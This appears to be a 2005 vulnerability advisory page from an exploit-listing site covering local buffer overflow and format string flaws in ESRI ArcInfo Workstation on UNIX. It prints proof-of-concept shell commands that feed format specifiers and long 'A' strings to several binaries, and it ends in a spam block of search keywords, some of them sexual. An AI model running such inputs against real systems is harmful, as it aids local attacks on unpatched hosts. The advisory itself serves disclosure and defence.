exploits , vulnerabilities , articles , ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
| Title |
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities |
| Published |
2005-04-30-12:00AM |
| Updated |
2005-05-24-02:45PM |
| Class |
Unknown |
| CVE |
CAN-2005-1393 CAN-2005-1394 |
| Remote |
No |
| Local |
Yes |
| Credit |
Discovery is credited to Kevin Finisterre. |
| Vulnerable |
ESRI ArcInfo Workstation on UNIX 9.0
ESRI ArcInfo Workstation on UNIX 8.3 |
| Not Vulnerable |
|
| Code |
The following proof-of-concept examples were provided:
-bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x -bash-2.05b$ ./wservice Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run! -bash-2.05b# export ARCHOME=%x.%x.%x.%x -bash-2.05b# ./lockmgr Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run! -bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b FATAL ERROR Segment Violation -bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a FATAL ERROR Segment Violation -bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'` FATAL ERROR Segment Violation -bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'` FATAL ERROR Segment Violation -bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a FATAL ERROR Segment Violation
Exploit code was also released for the 'wservice' format string vulnrability.
/data/vulnerabilities/exploits/ex_arcgis.c
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 18 Dec 2009 16:56:51 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ebony sex School.Sex freefhqiig rainbow ontap huangbiang T M all music. free downl fresh prin www.sy-ad. php-nuke 2 free sexy cve-2001-1 fcfcfy phpWebFTP maxcpm.inf DSL-G624T naruto.sex Www.pinkwo italiano g wwwseks compiled p MRPC %.../cabil 3 2?1 port 2107 phots Www.gadis Www.tube8. Hindi.News imagini www.qvod00 mamb....in news for c /search/ex XDOMAIn.bl exe maxcpm.inf www.fuckgi videodb www.kaqise firefox 1. SMF Image Iranmusic. onlysex webmin fil Nude girls SQuery/lib vBulletin+
|